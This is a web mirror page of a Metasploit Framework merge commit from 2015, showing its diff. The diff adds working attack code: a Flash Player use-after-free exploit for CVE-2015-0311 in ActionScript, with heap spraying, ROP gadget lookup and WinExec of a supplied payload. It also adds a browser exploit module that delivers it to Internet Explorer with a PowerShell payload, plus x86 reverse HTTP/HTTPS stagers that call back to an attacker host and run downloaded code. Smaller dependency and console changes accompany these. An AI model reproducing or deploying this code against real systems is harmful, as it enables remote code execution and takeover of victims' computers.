github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-02 07:40:19 +02:00
Code Releases Activity

Merge branch 'master' into feature/add-reverse_winhttp-stagers

Browse Source
This commit is contained in:
HD Moore 2015-03-11 14:29:34 -05:00
commit ea1bc69e2e
21 changed files with 1021 additions and 258 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Gemfile.lock
View File

@ -22,7 +22,7 @@ PATH
tzinfo
metasploit-framework-db (4.11.0.pre.dev)
activerecord (>= 3.2.21, < 4.0.0)
metasploit-credential (~> 0.14.2)
metasploit-credential (~> 0.14.3)
metasploit-framework (= 4.11.0.pre.dev)
metasploit_data_models (~> 0.23.0)
pg (>= 0.11)
@ -112,7 +112,7 @@ GEM
metasploit-concern (0.3.0)
activesupport (~> 3.0, >= 3.0.0)
railties (< 4.0.0)
metasploit-credential (0.14.2)
metasploit-credential (0.14.3)
metasploit-concern (~> 0.3.0)
metasploit-model (~> 0.29.0)
metasploit_data_models (~> 0.23.0)

BIN
data/exploits/CVE-2015-0311/msf.swf Executable file
View File

Binary file not shown.

242
external/source/exploits/CVE-2015-0311/Main.as vendored Executable file
View File

@ -0,0 +1,242 @@
// Build how to:
// 1. Download the AIRSDK, and use its compiler.
// 2. Be support to support 16.0 as target-player (flex-config.xml).
// 3. Download the Flex SDK (4.6)
// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
// 5. Build with: mxmlc -o msf.swf Main.as
// Original code by @hdarwin89 // http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/
// Modified to be used from msf
package
{
import flash.display.Sprite;
import flash.display.LoaderInfo;
import flash.system.ApplicationDomain;
import flash.utils.ByteArray;
import avm2.intrinsics.memory.casi32;
import flash.external.ExternalInterface;
import mx.utils.Base64Decoder;
public class Main extends Sprite
{
private var data:uint = 0xdeaddead
private var uv:Vector.<Object> = new Vector.<Object>
private var ba:ByteArray = new ByteArray()
private var spray:Vector.<Object> = new Vector.<Object>(51200)
private var b64:Base64Decoder = new Base64Decoder();
private var payload:String = "";
/*public static function log(msg:String):void{
var str:String = "";
str += msg;
trace(str);
if(ExternalInterface.available){
ExternalInterface.call("alert", str);
}
}*/
public function Main()
{
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
payload = b64.toByteArray().toString();
for (var i:uint = 0; i < 1000; i++) ba.writeUnsignedInt(data++)
ba.compress()
ApplicationDomain.currentDomain.domainMemory = ba
ba.position = 0x200
for (i = 0; i < ba.length - ba.position; i++) ba.writeByte(00)
try {
ba.uncompress()
} catch (e:Error) { }
uv[0] = new Vector.<uint>(0x3E0)
casi32(0, 0x3e0, 0xffffffff)
for (i = 0; i < spray.length; i++) {
spray[i] = new Vector.<Object>(1014)
spray[i][0] = ba
spray[i][1] = this
}
/*
0:008> dd 5ca4000
05ca4000 ffffffff 05042000 05ca4000 00000000
05ca4010 00000000 00000000 00000000 00000000
05ca4020 00000000 00000000 00000000 00000000
05ca4030 00000000 00000000 00000000 00000000
05ca4040 00000000 00000000 00000000 00000000
05ca4050 00000000 00000000 00000000 00000000
05ca4060 00000000 00000000 00000000 00000000
05ca4070 00000000 00000000 00000000 00000000
*/
uv[0][0] = uv[0][0x2000003] - 0x18 - 0x2000000 * 4
//log("uv[0][0]: " + uv[0][0].toString(16));
ba.endian = "littleEndian"
ba.length = 0x500000
var buffer:uint = vector_read(vector_read(uv[0][0x2000008] - 1 + 0x40) + 8) + 0x100000
//log("buffer: " + buffer.toString(16));
var main:uint = uv[0][0x2000009] - 1
//log("main: " + main.toString(16));
var vtable:uint = vector_read(main)
//log("vtable: " + vtable.toString(16));
vector_write(vector_read(uv[0][0x2000008] - 1 + 0x40) + 8)
vector_write(vector_read(uv[0][0x2000008] - 1 + 0x40) + 16, 0xffffffff)
byte_write(uv[0][0])
var flash:uint = base(vtable)
//log("flash: " + flash.toString(16));
// Because of the sandbox, when you try to solve kernel32
// from the flash imports on IE, it will solve ieshims.dll
var ieshims:uint = module("kernel32.dll", flash)
//log("ieshims: " + ieshims.toString(16));
var kernel32:uint = module("kernel32.dll", ieshims)
//log("kernel32: " + kernel32.toString(16));
var ntdll:uint = module("ntdll.dll", kernel32)
//log("ntdll: " + ntdll.toString(16));
var urlmon:uint = module("urlmon.dll", flash)
//log("urlmon: " + urlmon.toString(16));
var virtualprotect:uint = procedure("VirtualProtect", kernel32)
//log("virtualprotect: " + virtualprotect.toString(16));
var winexec:uint = procedure("WinExec", kernel32)
//log("winexec: " + winexec.toString(16));
var urldownloadtofile:uint = procedure("URLDownloadToFileA", urlmon);
//log("urldownloadtofile: " + urldownloadtofile.toString(16));
var getenvironmentvariable:uint = procedure("GetEnvironmentVariableA", kernel32)
//log("getenvironmentvariable: " + getenvironmentvariable.toString(16));
var setcurrentdirectory:uint = procedure("SetCurrentDirectoryA", kernel32)
//log("setcurrentdirectory: " + setcurrentdirectory.toString(16));
var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
//log("xchgeaxespret: " + xchgeaxespret.toString(16));
var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
//log("xchgeaxesiret: " + xchgeaxesiret.toString(16));
// CoE
byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
byte_write(0, "\x89\x03", false) // mov [ebx], eax
byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
byte_write(buffer+0x200, payload);
byte_write(buffer + 0x20070, xchgeaxespret)
byte_write(buffer + 0x20000, xchgeaxesiret)
byte_write(0, virtualprotect)
// VirtualProtect
byte_write(0, winexec)
byte_write(0, buffer + 0x30000)
byte_write(0, 0x1000)
byte_write(0, 0x40)
byte_write(0, buffer + 0x100)
// WinExec
byte_write(0, buffer + 0x30000)
byte_write(0, buffer + 0x200)
byte_write(0)
byte_write(main, buffer + 0x20000)
toString()
}
private function vector_write(addr:uint, value:uint = 0):void
{
addr > uv[0][0] ? uv[0][(addr - uv[0][0]) / 4 - 2] = value : uv[0][0xffffffff - (uv[0][0] - addr) / 4 - 1] = value
}
private function vector_read(addr:uint):uint
{
return addr > uv[0][0] ? uv[0][(addr - uv[0][0]) / 4 - 2] : uv[0][0xffffffff - (uv[0][0] - addr) / 4 - 1]
}
private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
{
if (addr) ba.position = addr
if (value is String) {
for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
if (zero) ba.writeByte(0)
} else ba.writeUnsignedInt(value)
}
private function byte_read(addr:uint, type:String = "dword"):uint
{
ba.position = addr
switch(type) {
case "dword":
return ba.readUnsignedInt()
case "word":
return ba.readUnsignedShort()
case "byte":
return ba.readUnsignedByte()
}
return 0
}
private function base(addr:uint):uint
{
addr &= 0xffff0000
while (true) {
if (byte_read(addr) == 0x00905a4d) return addr
addr -= 0x10000
}
return 0
}
private function module(name:String, addr:uint):uint
{
var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80)
var i:int = -1
while (true) {
var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
if (!entry) throw new Error("FAIL!");
ba.position = addr + entry
var dll_name:String = ba.readUTFBytes(name.length).toUpperCase();
if (dll_name == name.toUpperCase()) {
break;
}
}
return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)));
}
private function procedure(name:String, addr:uint):uint
{
var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
var numberOfNames:uint = byte_read(eat + 0x18)
var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
var addressOfNames:uint = addr + byte_read(eat + 0x20)
var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
for (var i:uint = 0; ; i++) {
var entry:uint = byte_read(addressOfNames + i * 4)
ba.position = addr + entry
if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
}
return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
}
private function gadget(gadget:String, hint:uint, addr:uint):uint
{
var find:uint = 0
var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
var value:uint = parseInt(gadget, 16)
for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
return addr + i
}
}
}

34
lib/msf/core/handler/reverse_http/uri_checksum.rb
View File

@ -76,8 +76,11 @@ module Msf
# Create a URI that matches a given checksum
#
# @param sum [Fixnum] The checksum value you are trying to create a URI for
# @param len [Fixnum] An optional length value for the created URI
# @return [String] The URI string that checksums to the given value
def generate_uri_checksum(sum)
def generate_uri_checksum(sum,len=nil)
return generate_uri_checksum_with_length(sum, len) if len
chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
32.times do
uri = Rex::Text.rand_text_alphanumeric(3)
@ -90,6 +93,35 @@ module Msf
return URI_CHECKSUM_PRECALC[sum]
end
# Create an arbitrary length URI that matches a given checksum
#
# @param sum [Fixnum] The checksum value you are trying to create a URI for
# @param len [Fixnum] The length of the created URI
# @return [String] The URI string that checksums to the given value
def generate_uri_checksum_with_length(sum, len)
# Lengths shorter than 4 bytes are unable to match all possible checksums
# Lengths of exactly 4 are relatively slow to find for high checksum values
# Lengths of 5 or more bytes find a matching checksum fairly quickly (~80ms)
raise ArgumentError, "Length must be 5 bytes or greater" if len < 5
# Funny enough, this was more efficient than calculating checksum offsets
if len < 40
loop do
uri = Rex::Text.rand_text_alphanumeric(len)
return uri if Rex::Text.checksum8(uri) == sum
end
end
# The rand_text_alphanumeric() method becomes a bottleneck at around 40 bytes
# Calculating a static prefix flattens out the average runtime for longer URIs
prefix = Rex::Text.rand_text_alphanumeric(len-20)
loop do
uri = prefix + Rex::Text.rand_text_alphanumeric(20)
return uri if Rex::Text.checksum8(uri) == sum
end
end
end
end
end

7
lib/msf/core/payload/windows.rb
View File

@ -150,5 +150,12 @@ module Msf::Payload::Windows
return true
end
#
# Share the EXITFUNC mappings with other classes
#
def self.exit_types
@@exit_types.dup
end
end

112
lib/msf/core/payload/windows/block_api.rb Normal file
View File

@ -0,0 +1,112 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf
###
#
# Basic block_api stubs for Windows ARCH_X86 payloads
#
###
module Payload::Windows::BlockApi
def asm_block_api(opts={})
raw = %q^
api_call:
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
mov ebp, esp ; Create a new stack frame
xor eax, eax ; Zero EAX (upper 3 bytes will remain zero until function is found)
mov edx, [fs:eax+48] ; Get a pointer to the PEB
mov edx, [edx+12] ; Get PEB->Ldr
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
next_mod: ;
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
xor edi, edi ; Clear EDI which will store the hash of the module name
loop_modname: ;
lodsb ; Read in the next byte of the name
cmp al, 'a' ; Some versions of Windows use lower case module names
jl not_lowercase ;
sub al, 0x20 ; If so normalise to uppercase
not_lowercase: ;
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop untill we have read enough
; We now have the module hash computed
push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later
; Proceed to iterate the export address table
mov edx, [edx+16] ; Get this modules base address
mov ecx, [edx+60] ; Get PE header
; use ecx as our EAT pointer here so we can take advantage of jecxz.
mov ecx, [ecx+edx+120] ; Get the EAT from the PE header
jecxz get_next_mod1 ; If no EAT present, process the next module
add ecx, edx ; Add the modules base address
push ecx ; Save the current modules EAT
mov ebx, [ecx+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address
mov ecx, [ecx+24] ; Get the number of function names
; now ecx returns to its regularly scheduled counter duties
; Computing the module hash + function hash
get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
dec ecx ; Decrement the function name counter
mov esi, [ebx+ecx*4] ; Get rva of next module name
add esi, edx ; Add the modules base address
xor edi, edi ; Clear EDI which will store the hash of the function name
; And compare it to the one we want
loop_funcname: ;
lodsb ; Read in the next byte of the ASCII function name
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
jne loop_funcname ; If we have not reached the null terminator, continue
add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
jnz get_next_func ; Go compute the next function hash if we have not found it
; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva
add ebx, edx ; Add the modules base address
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
mov ebx, [eax+28] ; Get the function addresses table rva
add ebx, edx ; Add the modules base address
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
add eax, edx ; Add the modules base address to get the functions actual VA
; We now fix up the stack and perform the call to the desired function...
finish:
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
pop ebx ; Clear off the current modules hash
pop ebx ; Clear off the current position in the module list
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
pop ecx ; Pop off the origional return address our caller will have pushed
pop edx ; Pop off the hash value our caller will have pushed
push ecx ; Push back the correct return value
jmp eax ; Jump into the required function
; We now automagically return to the correct caller...
get_next_mod: ;
pop edi ; Pop off the current (now the previous) modules EAT
get_next_mod1: ;
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
jmp.i8 next_mod ; Process this module
^
end
end
end

79
lib/msf/core/payload/windows/exitfunk.rb Normal file
View File

@ -0,0 +1,79 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/windows'
module Msf
###
#
# Implements arbitrary exit routines for Windows ARCH_X86 payloads
#
###
module Payload::Windows::Exitfunk
def asm_exitfunk(opts={})
asm = "exitfunk:\n"
case opts[:exitfunk]
when 'seh'
asm << %Q^
mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['seh']}
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; SetUnhandledExceptionFilter(0)
push.i8 0
ret ; Return to NULL (crash)
^
# On Windows Vista, Server 2008, and newer, it is not possible to call ExitThread
# on WoW64 processes, instead we need to call RtlExitUserThread. This stub will
# automatically generate the right code depending on the selected exit method.
when 'thread'
asm << %Q^
mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['thread']}
push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7
jl exitfunk_goodbye ; Then just call the exit function...
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne exitfunk_goodbye ;
mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
exitfunk_goodbye: ; We now perform the actual call to the exit function
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; call ExitThread(0) || RtlExitUserThread(0)
^
when 'process', nil
asm << %Q^
mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['process']}
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; ExitProcess(0)
^
when 'sleep'
asm << %Q^
mov ebx, #{"0x%.8x" % Rex::Text.ror13_hash('Sleep')}
push 300000 ; 300 seconds
push ebx ; push the hash of the function
call ebp ; Sleep(300000)
jmp exitfunk ; repeat
^
else
# Do nothing and continue after the end of the shellcode
end
asm
end
end
end

333
lib/msf/core/payload/windows/reverse_http.rb Normal file
View File

@ -0,0 +1,333 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/windows/block_api'
require 'msf/core/payload/windows/exitfunk'
module Msf
###
#
# Complex payload generation for Windows ARCH_X86 that speak HTTP(S)
#
###
module Payload::Windows::ReverseHttp
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Windows::Exitfunk
#
# Register reverse_http specific options
#
def initialize(*args)
super
register_advanced_options(
[
OptInt.new('HTTPStagerURILength', [false, 'The URI length for the stager (at least 5 bytes)'])
], self.class)
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_reverse_http(
ssl: false,
host: datastore['LHOST'],
port: datastore['LPORT'],
url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW))
end
conf = {
ssl: false,
host: datastore['LHOST'],
port: datastore['LPORT'],
url: generate_uri,
exitfunk: datastore['EXITFUNC']
}
generate_reverse_http(conf)
end
#
# Generate and compile the stager
#
def generate_reverse_http(opts={})
combined_asm = %Q^
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
#{asm_block_api}
start:
pop ebp
#{asm_reverse_http(opts)}
^
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
end
#
# Generate the URI for the initial stager
#
def generate_uri
uri_req_len = datastore['HTTPStagerURILength'].to_i
# Choose a random URI length between 30 and 255 bytes
if uri_req_len == 0
uri_req_len = 30 + rand(256-30)
end
if uri_req_len < 5
raise ArgumentError, "Minimum HTTPStagerURILength is 5"
end
"/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len)
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = cached_size
# Add 100 bytes for the encoder to have some room
space += 100
# Make room for the maximum possible URL length
space += 256
# EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
space += 31
# The final estimated size
space
end
#
# Dynamic payload generation
#
def asm_reverse_http(opts={})
#
# options should contain:
# ssl: (true|false)
# url: "/url_to_request"
# host: [hostname]
# port: [port]
# exitfunk: [process|thread|seh|sleep]
#
http_open_flags = 0
if opts[:ssl]
#;0x80000000 | ; INTERNET_FLAG_RELOAD
#;0x04000000 | ; INTERNET_NO_CACHE_WRITE
#;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
#;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
#;0x00000200 | ; INTERNET_FLAG_NO_UI
#;0x00800000 | ; INTERNET_FLAG_SECURE
#;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
#;0x00001000 ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000 )
else
#;0x80000000 | ; INTERNET_FLAG_RELOAD
#;0x04000000 | ; INTERNET_NO_CACHE_WRITE
#;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
#;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
#;0x00000200 ; INTERNET_FLAG_NO_UI
http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 )
end
asm = %Q^
;-----------------------------------------------------------------------------;
; Author: HD Moore
; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000
; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)
; Version: 1.0
;-----------------------------------------------------------------------------;
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
load_wininet:
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack.
push 0x696e6977 ; ...
push esp ; Push a pointer to the "wininet" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "wininet" )
set_retry:
push.i8 8 ; retry 8 times should be enough
pop edi
xor ebx, ebx ; push 8 zeros ([1]-[8])
mov ecx, edi
push_zeros:
push ebx
loop push_zeros
internetopen:
; DWORD dwFlags [1]
; LPCTSTR lpszProxyBypass (NULL) [2]
; LPCTSTR lpszProxyName (NULL) [3]
; DWORD dwAccessType (PRECONFIG = 0) [4]
; LPCTSTR lpszAgent (NULL) [5]
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
internetconnect:
; DWORD_PTR dwContext (NULL) [6]
; dwFlags [7]
push.i8 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
push ebx ; password (NULL)
push ebx ; username (NULL)
push #{opts[:port]} ; PORT
call got_server_uri ; double call to get pointer for both server_uri and
server_uri: ; server_host; server_uri is saved in EDI for later
db "#{opts[:url]}", 0x00
got_server_host:
push eax ; HINTERNET hInternet
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp
httpopenrequest:
; dwContext (NULL) [8]
push #{"0x%.8x" % http_open_flags} ; dwFlags
push ebx ; accept types
push ebx ; referrer
push ebx ; version
push edi ; server URI
push ebx ; method
push eax ; hConnection
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
xchg esi, eax ; save hHttpRequest in esi
send_request:
^
if opts[:ssl]
asm << %Q^
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
push 0x00003380
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
mov eax, esp
push.i8 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push.i8 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hHttpRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
^
end
asm << %Q^
httpsendrequest:
push ebx ; lpOptional length (0)
push ebx ; lpOptional (NULL)
push ebx ; dwHeadersLength (0)
push ebx ; lpszHeaders (NULL)
push esi ; hHttpRequest
push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" )
call ebp
test eax,eax
jnz allocate_memory
try_it_again:
dec edi
jnz send_request
; if we didn't allocate before running out of retries, bail out
^
if opts[:exitfunk]
asm << %Q^
failure:
call exitfunk
^
else
asm << %Q^
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
^
end
asm << %Q^
allocate_memory:
push.i8 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (4Mb ought to do us)
push ebx ; NULL as we dont care where the allocation is
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
xchg eax, ebx ; place the allocated base address in ebx
push ebx ; store a copy of the stage base address on the stack
push ebx ; temporary storage for bytes read count
mov edi, esp ; &bytesRead
download_more:
push edi ; &bytesRead
push 8192 ; read length
push ebx ; buffer
push esi ; hRequest
push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" )
call ebp
test eax,eax ; download failed? (optional?)
jz failure
mov eax, [edi]
add ebx, eax ; buffer += bytes_received
test eax,eax ; optional?
jnz download_more ; continue until it returns 0
pop eax ; clear the temporary storage
execute_stage:
ret ; dive into the stored stage address
got_server_uri:
pop edi
call got_server_host
server_host:
db "#{opts[:host]}", 0x00
^
if opts[:exitfunk]
asm << asm_exitfunk(opts)
end
asm
end
#
# Do not transmit the stage over the connection. We handle this via HTTPS
#
def stage_over_connection?
false
end
#
# Always wait at least 20 seconds for this payload (due to staging delays)
#
def wfs_delay
20
end
end
end

63
lib/msf/core/payload/windows/reverse_https.rb Normal file
View File

@ -0,0 +1,63 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/windows/reverse_http'
module Msf
###
#
# Complex payload generation for Windows ARCH_X86 that speak HTTPS
#
###
module Payload::Windows::ReverseHttps
include Msf::Payload::Windows::ReverseHttp
#
# Generate and compile the stager
#
def generate_reverse_https(opts={})
combined_asm = %Q^
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
#{asm_block_api}
start:
pop ebp
#{asm_reverse_http(opts)}
^
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_reverse_https(
host: datastore['LHOST'],
port: datastore['LPORT'],
url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW),
ssl: true)
end
conf = {
ssl: true,
host: datastore['LHOST'],
port: datastore['LPORT'],
url: generate_uri,
exitfunk: datastore['EXITFUNC']
}
generate_reverse_https(conf)
end
end
end

19
lib/msf/ui/console/command_dispatcher/db.rb
View File

@ -1687,12 +1687,12 @@ class Db
return if not db_check_driver
if framework.db.connection_established?
cdb = ""
::ActiveRecord::Base.connection_pool.with_connection { |conn|
if conn.respond_to? :current_database
cdb = ''
::ActiveRecord::Base.connection_pool.with_connection do |conn|
if conn.respond_to?(:current_database)
cdb = conn.current_database
end
}
end
print_status("#{framework.db.driver} connected to #{cdb}")
else
print_status("#{framework.db.driver} selected, no connection")
@ -1706,6 +1706,17 @@ class Db
def cmd_db_connect(*args)
return if not db_check_driver
if args[0] != '-h' && framework.db.connection_established?
cdb = ''
::ActiveRecord::Base.connection_pool.with_connection do |conn|
if conn.respond_to?(:current_database)
cdb = conn.current_database
end
end
print_error("#{framework.db.driver} already connected to #{cdb}")
print_error('Run db_disconnect first if you wish to connect to a different database')
return
end
if (args[0] == "-y")
if (args[1] and not ::File.exists? ::File.expand_path(args[1]))
print_error("File not found")

2
metasploit-framework-db.gemspec
View File

@ -29,7 +29,7 @@ Gem::Specification.new do |spec|
spec.add_runtime_dependency 'activerecord', *Metasploit::Framework::RailsVersionConstraint::RAILS_VERSION
# Metasploit::Credential database models
spec.add_runtime_dependency 'metasploit-credential', '~> 0.14.2'
spec.add_runtime_dependency 'metasploit-credential', '~> 0.14.3'
# Database models shared between framework and Pro.
spec.add_runtime_dependency 'metasploit_data_models', '~> 0.23.0'
# depend on metasploit-framewrok as the optional gems are useless with the actual code

107
modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb Normal file
View File

@ -0,0 +1,107 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',
'Description' => %q{
This module exploits an use after free vulnerability in Adobe Flash Player. The
vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying
to uncompress() a malformed byte stream. This module has been tested successfully
on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and
16.0.0.235.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery and exploit in the wild
'hdarwin', # Public exploit by @hdarwin89
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-0311'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],
['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],
['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.287' },
:arch => ARCH_X86
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 28 2014',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end

69
modules/payloads/stagers/windows/reverse_http.rb
View File

@ -6,14 +6,15 @@
require 'msf/core'
